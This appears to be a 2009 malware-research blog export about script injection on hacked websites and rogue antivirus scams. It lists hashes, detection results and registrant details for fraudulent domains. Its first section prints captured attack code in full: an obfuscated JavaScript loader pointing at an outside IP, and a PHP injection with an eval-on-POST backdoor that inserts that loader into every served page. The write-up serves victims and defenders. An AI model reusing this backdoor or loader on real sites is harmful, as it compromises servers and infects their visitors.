The executable also has a random name (PO.exe, 8lv.exe ...).<br /> <br /> File Size: 15360 Bytes <br /> MD5: 791509d03706cbc8883536b5131341d4<br /> <br /> <a href="http://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html" target="_blank">Anubis Report</a><br /> <br /> <a href="http://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a" target="_blank">VirusTotal Analysis</a>: 10/40 (25%)<br /> <br /> a-squared - Trojan-Spy.Agent!IK <br /> Avast - Win32.Daonol-L<br /> eSafe - Suspicious File <br /> GData - Win32:KillAV-KS <br /> Ikarus - Trojan-Spy.Agent<br /> Kaspersky - Backdoor.Win32.Agent.afhg<br /> McAfee+Artemis - Generic!Artemis<br /> Prevx1 - High Risk Cloaked Malware<br /> Sophos - Mal/Generic-A<br /> TrendMicro - PAK_Generic.001 <br /><br /> First received on 04.03.2009 18:36:21 (CET) <br /> <br /> Ikarus: Trojan-Spy.Agent (Sig-Id:975847) <br /> <br /> <a href="http://www.threatexpert.com/report.aspx?md5=791509d03706cbc8883536b5131341d4" target="_blank">ThreatExpert Report</a><br /> <a href="http://info.prevx.com/aboutprogramtext.asp?PX5=553B1FA200AA99603C6800E34911BA008604CE7A" target="_blank">Prevx</a><br /> <br /> Sources:<br /> <br /> <a href="http://discussion.dreamhost.com/showthreaded.pl?Cat=&Board=forum_troubleshooting&Number=117798&page=4&view=expanded&sb=6&o=14&vc=1" target="_blank">dreamhost.com discussion</a><br /> <a href="http://www.dynamicdrive.com/forums/showthread.php?p=191051" target="_blank">dynamicdrive.com forum</a><br /> <a href="http://www.windowsbbs.com/malware-virus-removal/82784-js-script-juliet.html" target="_blank">windowsbbs.com forum</a> <br /> <a href="http://www.spywarewarrior.com/viewtopic.php?t=30508" target="_blank">spywarewarrior.com forum</a> <br /> <a href="http://www.who-is-who-in-gpt.com/forum/index.php?showtopic=10478" target="_blank">who-is-who-in-gpt.com</a> <br /> <a href="http://www.tcheval.net/forum/s3071-regle-tcheval-net-victime-hack.html" target="_blank">tcheval.net forum 
(FR)</a><br /><hr /> Also of interest on this IP is this script:<br /> <br /> If you have this code in your site, you are probably one of these victims. <br />Change all your passwords (FTP, e-mail, control panel and so on) on all your accounts.<br /> <br /> 94.247.2.195/jquery.js <br /> or<br /> 78.110.175.249/jquery.js (not responding; the RIPE contact is Russian, the netblock is announced by a UK host)<br /> <br />descr: LIMIT SUREHOST - AAS188-RIPE - @ukservers.com<br />person: Alexander A Solovyov -  @limt.ru<br />LIMT Group Ltd. has zero web presence apart from spam, hacking and other problems.<br />They are clearly a bogus company, and the same goes for LIMIT SUREHOST.<br /><br />route: 78.110.160.0/20 - UK Dedicated Servers Limited - AS42831 - UKSERVERS-MNT<br /> <br /> JavaScript code (the line breaks the blog showed inside the string literal are removed here; the script is a single line). Once unescape() has run and the junk tokens Cl6, HY8, zAn, Sn, rL, Vh and GX are stripped, what remains is a script tag whose src is //78.110.175.249/jquery.js:<br /> <br /> <script language=javascript><br /> document.write(unescape('%3CGXscrLrGXirLpt%20VhsrcrL%3DSn%2FHY8%2F78HY8%2EGX1GX1Cl60%2ECl61Cl67Cl65Cl6%2E24Vh9zAn%2FCl6jquVheHY8rrLyCl6%2EjSns%3EGX%3C%2FGXszAnczAnrHY8iprLtzAn%3E').replace(/Cl6|HY8|zAn|Sn|rL|Vh|GX/g,""));<br /> </script> <br /><br /> This script was found on compromised websites, all for the benefit of the<br /> infamous <a href="http://en.wikipedia.org/wiki/Russian_Business_Network" target="_blank">Russian Business Network</a> (RBN).<br /><br /> Injected PHP code. Its TMP_XHGFJOKL constant is the base64 of the same loader script, and the output-buffer callback registered with ob_start() inserts it before the body tag of every page the server sends (or appends it when there is no body tag); the eval() on $_POST['tmp_lkojfghx3'] is a remote backdoor on top of that.<br /><br /><?php <br />if (!function_exists('tmp_lkojfghx')) { <br />for ($i = 1; $i < 10; $i++) <br />if (is_file($f = '/tmp/m' . 
$i)) { <br />include_once($f); <br />break; <br />} <br />if (isset($_POST['tmp_lkojfghx3'])) <br />eval($_POST['tmp_lkojfghx3']); <br />if (!defined('TMP_XHGFJOKL')) <br />define('TMP_XHGFJOKL', base64_decode('PHNjcmlwdCBsYW5<br />ndWFnZT1qYXZhc2NyaXB0PjwhLS0gCmRvY3VtZW50LndyaX<br />RlKHVuZXNjYXBlKCdyYzYlM0Nla2JzMndjcmlJaXAyd3QlMjBzMFM<br />wcmMlM0QlMkYlMkY3SFh6OCUyRTBTMDEydzEwSFh6JTJFcm<br />M2MXJON0hYejVEdSUyRXJOMjRla2I5JTJGMndqcmM2cUlpdW<br />VyZWtieWVrYiUyRXJjNmpyYzZzJTNFMFMwJTNDMnclMkZzYzB<br />TMHJIWHppcGVrYnQlM0UnKS5yZXBsYWNlKC9yYzZ8MFMwfE<br />lpfER1fGVrYnxyTnwyd3xIWHovZywiIikpOwogLS0+PC9zY3Jp<br />cHQ+')); <br />function tmp_lkojfghx($s) <br />{ <br />if ($g = (bin2hex(substr($s, 0, 2)) == '1f8b')) <br />$s = gzinflate(substr($s, 10, -8)); <br />if (preg_match_all('#<script(.*?)</script>#is', $s, $a)) <br />foreach ($a[0] as $v) <br />if (count(explode("\n", $v)) > 5) { <br />$e = preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#', $v)<br />|| preg_match('#[\(\[](\s*\d+,){20,}#', $v); <br />if ((preg_match('#\beval\b#', $v) &&<br /> ($e || strpos($v, 'fromCharCode'))) ||<br />($e && strpos($v, 'document.write'))) <br />$s = str_replace($v, '', $s); <br />} <br />$s1 = preg_replace('#<script language=javascript><br /><!-- \ndocument\.write\(unescape\(".+?\n --></script>#', '', $s); <br />if (stristr($s, '<body')) <br />$s = preg_replace('#(\s*<body)#mi', TMP_XHGFJOKL . '\1', $s1); <br />elseif (($s1 != $s) || stristr($s, '</body') || stristr($s, '</title>')) <br />$s = $s1 . TMP_XHGFJOKL; <br />return $g ? gzencode($s) : $s; <br />} <br />function tmp_lkojfghx2($a = 0, $b = 0, $c = 0, $d = 0) <br />{ <br />$s = array(); <br />if ($b && $GLOBALS['tmp_xhgfjokl']) <br />call_user_func($GLOBALS['tmp_xhgfjokl'], $a, $b, $c, $d); <br />foreach (@ob_get_status(1) as $v) <br />if (($a = $v['name']) == 'tmp_lkojfghx') <br />return; <br />else <br />$s[] = array($a == 'default output handler' ? 
false : $a); <br />for ($i = count($s) - 1; $i >= 0; $i--) { <br />$s[$i][1] = ob_get_contents(); <br />ob_end_clean(); <br />} <br />ob_start('tmp_lkojfghx'); <br />for ($i = 0; $i < count($s); $i++) { <br />ob_start($s[$i][0]); <br />echo $s[$i][1]; <br />} <br />} <br />} <br />if (($a = @set_error_handler('tmp_lkojfghx2')) != 'tmp_lkojfghx2') <br />$GLOBALS['tmp_xhgfjokl'] = $a; <br />tmp_lkojfghx2(); <br />?> <br /><br />with colors:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTkZtWEP6_gg1iMICkg7c9coiJRyOt6t9rO944Vc0XAeiENw_GyXv_7BFkMqZzAwWF06mCHCUMEe-8J9WHP3KThnJKukqAWpJ9tHSAAZI-AI06AQ9nMf1HYH82HDdA8sLRGRNgmsXBv8J/s1600-h/php-code-injected.jpg"><img style="cursor:pointer; cursor:hand;width: 166px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhcTkZtWEP6_gg1iMICkg7c9coiJRyOt6t9rO944Vc0XAeiENw_GyXv_7BFkMqZzAwWF06mCHCUMEe-8J9WHP3KThnJKukqAWpJ9tHSAAZI-AI06AQ9nMf1HYH82HDdA8sLRGRNgmsXBv8J/s320/php-code-injected.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5320533877827604178" /></a><br /><br /><a href="http://www.google.com/search?hl=en&q=%22tmp_lkojfghx%22" target="_blank">Google search</a><br /> <br /> <br /><br /></p></td></tr><tr><td> </td></tr></table></td></tr></table></div><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." 
: "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-7584836-2");pageTracker._trackPageview();} catch(err) {}</script>Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-63017202674523978662009-04-03T03:37:00.000-07:002009-04-03T04:00:16.811-07:00Black Hat SEO and Rogue Antivirus p.6<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="560" height="833" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td width="572" height="833" valign="top"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span> <br /><br />Analyzing the tactic<br /></p><table width="549" height="136" border="0" cellpadding="0" cellspacing="0"><tr><td width="549"><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus" style="color: #333">THIS page</a> if you need more information<br /></td></tr></table><p> Yet another WinWebSecurity variant, this one pushed through crack/serial websites and an ad network. <br /><br />Fake ad:<br /><i>BE PROTECTED! - FREE online system scan for viruses, trojans and malware. <br />Check it out - maybe someone have access to your PC right now! 
Protect yourself.</i><br /><br />Clicking the ad starts a chain of redirections:<br /><br /><a href="http://wepawet.iseclab.org/view.php?hash=8bd407705e77d4149c2d8eeeb4a90624&t=1238754157&type=js" target="_blank">Redirection 1</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=be40e167ad6c26b527ee75aad00e64fe&t=1238754213&type=js" target="_blank">Redirection 2</a><br /><a href="http://wepawet.iseclab.org/view.php?hash=90186e983d193ade0128afc248ea596b&t=1238754257&type=js" target="_blank">Redirection 3</a> <br /><a href="http://wepawet.iseclab.org/view.php?hash=c6f5e7d7eeb0ffcc39f9084a69220f37&t=1238754295&type=js" target="_blank">Redirection 4</a><br /><br />ending at<br /><br />initialsecurityscan.com<br /><br />Retrieved from Google's cache <a href="http://209.85.229.132/search?q=cache:6dAQ_gk8K8kJ:filecourse.net/file-search-tube%2B8porno-1-full-version-with-crack-rapidshare-links.html+%22Check+it+out+-+maybe+someone+have+access+to+your+PC%22&cd=10&hl=en&ct=clnk" target="_blank">here</a><br /><br /><a href="http://www.virustotal.com/analisis/435fe8b2c2efcc6c268cf922927722d7" target="_blank">VirusTotal</a><br /><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=27C85C042834ACA4A88A01B1F2D26C00E41566C1" target="_blank">Prevx</a><br /><a href="http://anubis.iseclab.org/?action=result&task_id=18bd3ce55e3d94044d936bf1956b3e506" target="_blank">Anubis</a><br /><br />File install.exe received on 04.03.2009 12:28:53 (CET)<br />Result: 18/39 (46.16%) <br /><br />File info:<br /><br />File size: 108584 bytes<br />MD5: de926b63ab0976244d752170dac7ec00 <br /><br /><u>Hosted by Netelligent Hosting Services Inc.</u> on IP 209.44.126.14<br /><br /></p><p>Screenshots taken on Friday, April 3:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV5vLw9IvT1iT6JcKzjFxSvjsPrZVrNCNLZFD3zKRH01MGMOor_VOnRUMReUbtSczfhnqmk1XY5lQxiYDm_0qjlmcvx4c463CXq4t5sT6CKkDa7A348uwg9OnfVoL0tgW8mchZudeHb_rv/s1600-h/initialsecurityscan.com-ad-SCAM.jpg"><img 
style="cursor:pointer; cursor:hand;width: 320px; height: 231px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhV5vLw9IvT1iT6JcKzjFxSvjsPrZVrNCNLZFD3zKRH01MGMOor_VOnRUMReUbtSczfhnqmk1XY5lQxiYDm_0qjlmcvx4c463CXq4t5sT6CKkDa7A348uwg9OnfVoL0tgW8mchZudeHb_rv/s320/initialsecurityscan.com-ad-SCAM.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5320414093422583090" /></a><br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPNv0F1iZGu5fkcVWVgxSSk_ermXd3oN6Am64t4AR8KSswOT3t4ArJKO_-GOqkb__PBSakF9A7H8KuWAeZ3AMHgyyN9jT-YQdPtDracXDMke_OWGZiTnhRvWKvdwxP0gOYIUgxT68fcPDb/s1600-h/initialsecurityscan.com-SCAM.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 202px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPNv0F1iZGu5fkcVWVgxSSk_ermXd3oN6Am64t4AR8KSswOT3t4ArJKO_-GOqkb__PBSakF9A7H8KuWAeZ3AMHgyyN9jT-YQdPtDracXDMke_OWGZiTnhRvWKvdwxP0gOYIUgxT68fcPDb/s320/initialsecurityscan.com-SCAM.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5320412908331456530" /></a><br /><br />Uses NS1.FUCKMONEYCASH.COM and NS2.FUCKMONEYCASH.COM as DNS servers<br />No WHOIS information (PrivacyProtect.org)<br />Registrar: DIRECTI INTERNET SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br />Dates: Created 01-apr-2009<br />Registration Service Provided By: DOMAIN NAMES REGISTRAR REG.RU LTD.<br /> <br /><br /></p></td></tr></table></td></tr></table></div>
Unknownnoreply@blogger.comtag:blogger.com,1999:blog-8434732598810973720.post-25378368244379274822009-03-29T23:32:00.000-07:002009-03-29T23:44:58.440-07:00Black Hat SEO and Rogue Antivirus p.3<div style="font-size:10px; font-family:Tahoma, Geneva, sans-serif"><table width="529" height="1516" border="0" cellpadding="0" cellspacing="0" style="font-size:12px"><tr><td colspan="2" valign="top" height="833"><p><span style="font-size:14px; font-weight:bold">The silent threat: Black Hat SEO and Rogue Antivirus</span><br /><br />AntivirusPlus ZlKon Malware drop - liveinternetmarketingltd.com<br /></p><table width="266" height="31" border="1" cellpadding="0" cellspacing="0" bordercolor="#CCCCCC"><tr><td width="266" height="29">READ <a rel="dofollow" href="http://malware-web-threats.blogspot.com/2009/03/black-hat-seo-and-rogue-antivirus.html" title="Black Hat SEO and Rogue Antivirus">THIS page</a> if you need more information<br /></td> </tr></table><p>In addition to the fake scanner domains, recent research also reveals that several sites are <br />registered through "EVOPLUS LTD" with the following information:<br /><br />Registrant:<br />Live Internet Marketing Limited ****@liveinternetmarketingltd.com<br />attn: Private Registrations<br />5285 Decarie Boulevard #100<br />Montreal, QC H3W3C2<br />Canada<br />+1-514-371-5650<br /><br />Domain Name: LIVEINTERNETMARKETINGLTD.COM<br />Registrar: EVOPLUS LTD<br />Whois Server: whois.evonames.com<br />Referral URL: http://www.evonames.com<br />Name Server: NS1.LIVEINTERNETMARKETINGLTD.COM<br />Name Server: NS2.LIVEINTERNETMARKETINGLTD.COM<br />Status: clientDeleteProhibited<br />Status: clientTransferProhibited<br />Status: clientUpdateProhibited<br 
/>Updated Date: 27-mar-2009<br />Creation Date: 20-feb-2009<br />Expiration Date: 20-feb-2010<br /><br />Registered Through:<br />AdvancedHosters.com (http://www.AdvancedHosters.com)<br /><br />******************************<br /><br /> A Google search shows absolutely no web presence apart from malware and pornography websites:<br /><br />For <a href="http://www.google.com/search?hl=en&q=%22liveinternetmarketingltd%22" target="_blank">"liveinternetmarketingltd"</a>: malware domain drop and pornography websites<br />For <a href="http://www.google.com/search?hl=en&q=%22Live+Internet+Marketing+Limited%22" target="_blank">"Live Internet Marketing Limited"</a>: pornography websites<br />For <a href="http://www.google.com/search?hl=en&q=%22liveinternetmarketingltd.com%22" target="_blank">"liveinternetmarketingltd.com"</a>: pornography websites and a malware domain found by Malware Domain List.<br /><br />Malware Domain List shows 23 sites with the registrant information "liveinternetmarketingltd.com".<br /><br />Further domains registered with this information have been added to the list.<br /><br /> **********************<br /><br /> <u>SUSPENDED domains</u><br /><br />Registrar: DIRECTI INTERNET 
SOLUTIONS PVT. LTD. D/B/A PUBLICDOMAINREGISTRY.COM<br /><br /><b>antivirusplus.biz</b><br />***<br /><b>antivirusplus2009.net</b><br /><a href="https://safeweb.norton.com/report/show?name=antivirusplus2009.net" target="_blank">Symantec Result</a><br /> Registration Service Provided By: HIGH QUALITY HOST COMPANY<br /> ***<br /><b>avplus2009.com</b><br /><a href="https://safeweb.norton.com/report/show?name=avplus2009.com" target="_blank">Symantec Result</a> <br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br /> *** <br /><b>internet-check.net</b><br /> PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />***<br /><b>traffchecking.com</b><br />Registration Service Provided By: ERDOMAIN.COM<br />Registrant: uebochek - Luhansk Oblast,01001 - UA - uebochek@gmail.com<br /><br /><br />********************** </p><p><u>ACTIVE domains</u><br /><br />*** <br /><b>av-plus-support.com</b><br />PrivacyProtect - Registration Service Provided By: ERDOMAIN.COM<br />*** <br /><br />antivirusplussite.com has a fake error page which redirects to downloadantivirusplus.com/buy.php?id=<br /><br />downloadantivirusplus.com is hosted on the same IP at ZlKon and is also registered by "Live Internet Marketing Limited"; the fraudulent payment page is on the domain below:<br /><br />https://secure-plus-payments.com/cgi-bin/nph-pr/pandora/softcore/buy_soft.php?productid=avplus3&advert=<br /><br />209.8.25.204 - ns1.secure-plus-payments.com<br /><br /> Registration Service Provided By: RESELLERCLUB</p> <p>Registrant:<br />Globo inc<br />John Sparck (sparck000@mail.com)<br />South reg, 14 st, 3<br />Atoll<br />,3290867<br />BB<br />Tel. +27.221994</p> <p>"Globo inc" domains include: antivirus--plus.com, plus-antivirus.com (already suspended)</p> <p> **********************<br />A <a href="http://www.spamhaus.org/query/bl?ip=94.247.2.215" target="_blank">Spamhaus</a> lookup also reveals:<br /><br />newp-digital.com <br />webspywareremover2009.com <br />cure-soft.com [63.219.177.210]<br />innovagest2000s.com<br />secure-softwaretools.com [207.226.175.124]<br />**********************<br /><br /><br />Hosted on 94.247.2.215 [hs.2-215.zlkon.lv] AS12553<br /><br />AS12553 PCEXPRESS-AS "DATORU EXPRESS SERVISS" Ltd.<br /><br />Some screenshots:<br /><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETbUybvpe3XoD1bFdIhLqTcj2RwpnMh-6KJXUbMa3gpR8KwC5s7nyyazulhlLep8MRh8vVx-Zp_s1ACVz74o5empRz1bFjVBnV9qEetpQYKCh_0cMWV92kH5SZyHV5maCpxHeEgdv6il3/s1600-h/yournetascertain.jpg"><img style="cursor:pointer; cursor:hand;width: 318px; height: 320px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjETbUybvpe3XoD1bFdIhLqTcj2RwpnMh-6KJXUbMa3gpR8KwC5s7nyyazulhlLep8MRh8vVx-Zp_s1ACVz74o5empRz1bFjVBnV9qEetpQYKCh_0cMWV92kH5SZyHV5maCpxHeEgdv6il3/s320/yournetascertain.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318786689603306530" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfYTwDKG-4M59YYown-0lSYDHfTEWvEq2DoqkOgzFlIw7NmEBObrPpZrvrpNw3DGSLgJl02VUHp_urG2xzks7bipGcu_F2uiBPSg27wAygzhNS_bMca6G_k2bZWPfFQx9Fw34pnpfdq2KG/s1600-h/downloadantivirusplus.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 297px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhfYTwDKG-4M59YYown-0lSYDHfTEWvEq2DoqkOgzFlIw7NmEBObrPpZrvrpNw3DGSLgJl02VUHp_urG2xzks7bipGcu_F2uiBPSg27wAygzhNS_bMca6G_k2bZWPfFQx9Fw34pnpfdq2KG/s320/downloadantivirusplus.jpg" border="0" alt="" id="BLOGGER_PHOTO_ID_5318786689718896562" /></a><br /><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSU4vUyvlJseIkmJfgArdaZItmqC2m3UmUfGmpN0OLLhtHHmxqfM5KFi0LlrR_boWC37mj742CYXwQrpH7Inad89IC_Xn2yrQYbPK0QDWehuM8hg8yxUoU5yK0hyphenhyphenhHhyC82KdjHuRLfwQ/s1600-h/bestwebexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 298px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivSU4vUyvlJseIkmJfgArdaZItmqC2m3UmUfGmpN0OLLhtHHmxqfM5KFi0LlrR_boWC37mj742CYXwQrpH7Inad89IC_Xn2yrQYbPK0QDWehuM8hg8yxUoU5yK0hyphenhyphenhHhyC82KdjHuRLfwQ/s320/bestwebexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786687396297362" /></a><br /><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP9dZkU0HmIgzwHV-0CyMa4VF3uXUoA1JkOPJ8XhpLBo49D0LwcLe2XmjbU80PGKYp5xha7djTj6iXhaDy_PLKyOahPTn_GJkvGCFy_2a2WufJHRA08LmvE-66SwsR1kt94viSnQ0JiYK/s1600-h/bestinternetexamine.jpg"><img style="cursor:pointer; cursor:hand;width: 320px; height: 246px;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjYP9dZkU0HmIgzwHV-0CyMa4VF3uXUoA1JkOPJ8XhpLBo49D0LwcLe2XmjbU80PGKYp5xha7djTj6iXhaDy_PLKyOahPTn_GJkvGCFy_2a2WufJHRA08LmvE-66SwsR1kt94viSnQ0JiYK/s320/bestinternetexamine.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5318786686945225506" /></a><br />
<br /></p></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19x;padding:7px;"><b>Analysis:</b></td></tr><tr><td width="16" height="208" valign="top"><br /></td><td width="514"><br /><table width="514" border="0" cellspacing="0" cellpadding="0"><tr><td width="17"> </td><td width="99"><b>File info</b>:</td><td colspan="2">installer_1.exe</td><td width="62"> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>File size</td><td colspan="2">666112 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td colspan="2">03a1e599d66c64cd11eb5f20d3645767</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td></td><td colspan="3" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td><b>Anubis:</b></td><td colspan="2"><a href="http://anubis.iseclab.org/?action=result&task_id=14a7afddf1abf91e4dda10a549589bfba" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>ThreatExpert</b>:</td><td colspan="2"><a href="http://www.threatexpert.com/report.aspx?md5=03a1e599d66c64cd11eb5f20d3645767" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td colspan="2"><a href="http://www.virustotal.com/analisis/6bd9da2d0000574b72634ea98f9b4245" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>First received</td><td colspan="2">03.27.2009 17:40:50 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td colspan="2">17/38 (44.74%)</td><td> </td></tr><tr><td> </td><td> </td><td colspan="2"> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td width="225"><span 
style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td width="111">a-squared</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TR/Crypt.XPACK.Gen</span></td><td>Antivir</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">SHeur2.YCE</span></td><td>AVG</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">(Suspicious) - DNAScan</span></td><td>CAT-QuickHeal</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.DownLoad.33473</span></td><td>DrWeb</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>F-Secure</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">W32/FakeAV.NW!tr</span></td><td>Fortinet</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td>Ikarus</td><td> </td></tr><tr><td> </td><td> </td><td width="225"><span style="color:#FF0000">Trojan-Downloader.Win32.Delf.swq</span></td><td>Kaspersky</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Generic Downloader.x</span></td><td>McAfee</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Crypt.XPACK.Gen</span></td><td>McAfee-GW-Edition</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">TrojanDownloader:Win32/Renos.BAO</span></td><td>Microsoft</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Suspicious File</span></td><td>Panda</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Troj/FakeAV-NW</span></td><td>Sophos</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Fakeavalert.B</span></td><td>Sunbelt</td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan 
Horse</span></td><td>Symantec</td><td> </td></tr></table><br />We can see on <a href="http://malware-web-threats.blogspot.com/2009/03/easynetcheckonline-fraudtool-win32.html">this post</a> that the file downloaded two or three days later had been updated with new code.<br /><br /></td></tr><tr><td height="25" colspan="2" valign="top" style="background:url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5Mys96Pf0dtW1L7tKUiFWVVVD1ZmHLx3eZ8LXnpIEUioqMsXimIo-2wzIHbVQoKA5oDFpi1Ho5X-yiMzg8ESOj6iSKcCIdGbzEFyXa2U2q2aPFfq25hseA5fHGQH7RleVNGiNAtOWDFkt/s320/table_bg.gif) repeat-x;height:19px;padding:7px;"><b>Result when running:</b></td></tr><tr><td height="200"> </td><td> <br /> HTTP Request: 94.247.2.215 [hs.2-215.zlkon.lv]<br /><br />GET: myantivirusplus.com/install/AntivirusPlus.exe <br />GET: myantivirusplus.com/install/InternetExplorer.dll <br />GET: myantivirusplus.com/cfg/dmns.cfg <br /><br /><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">AntivirusPlus.exe</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>1435136 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>f0bc697765f31bd431e776387aca2c7f</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td></td><td colspan="2" bgcolor="#E8E8E8" style="height:2px"></td><td></td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td><b>Anubis</b>:</td><td><a href="http://anubis.iseclab.org/?action=result&task_id=1ce304ec73cca52440dd2b9bf9be6006b" target="_blank">Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">First Report</a></td><td> </td></tr><tr><td> </td><td><b>VirusTotal</b>:</td><td><a href="http://www.virustotal.com/analisis/3607f552f5e6f6fe89fdf175095a7e4f" target="_blank">Second 
Report</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>First received</td><td>03.27.2009 14:17:34 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 7/39 (17.95%)</td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Second time</td><td>03.30.2009 05:23:52 (CET)</td><td> </td></tr><tr><td> </td><td>Results</td><td>Result: 12/39 (30.77%)</td><td> </td></tr><tr><td> </td><td>New info</td><td><a href="http://info.prevx.com/aboutprogramtext.asp?PX5=0F1F76FB00F83E21E6DF158F5C45B4008B59BC51">Prevx</a></td><td> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>Alias:</td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA!IK</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">FakeAlert</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan.Win32.FakeXPA</span></td><td> </td></tr><tr><td> </td><td> </td><td><span style="color:#FF0000">Trojan:Win32/FakePlus</span></td><td> </td></tr></table><br /><table width="370" border="0" cellspacing="0" cellpadding="0"><tr><td width="19"> </td><td width="92"><b>File info</b>:</td><td width="226">InternetExplorer.dll</td><td width="33"> </td></tr><tr><td> </td><td> </td><td> </td><td> </td></tr><tr><td> </td><td>File size</td><td>442368 bytes</td><td> </td></tr><tr><td> </td><td>MD5</td><td>8e428574cb9e4f680d1e28fe3ca673e8</td><td> </td></tr><tr><td> </td><td> 